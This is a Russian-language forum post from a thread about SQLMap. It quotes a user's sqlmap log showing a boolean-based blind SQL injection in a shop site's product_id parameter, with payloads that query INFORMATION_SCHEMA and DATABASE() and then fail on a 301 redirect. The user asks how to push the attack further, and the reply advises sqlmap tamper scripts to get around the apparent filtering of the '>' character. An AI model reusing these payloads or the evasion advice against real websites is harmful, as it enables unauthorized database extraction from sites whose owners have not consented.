Тема: Вопросы по SQLMap
Показать сообщение отдельно

  #8  
Старый 18.07.2018, 17:34
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию
Цитата:
Сообщение от mardoksp  

Найдена уязвимость
Код:
Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/product&path=1&product_id=1 AND 7670=7670
    Vector: AND [INFERENCE]
При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/...1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо
Код:
--tamper=greatest или --tamper=between или --tamper=least
Попробуйте один из этих. Судя по логам проблема в символе >, возможно так же и в [B]
 
Ответить с цитированием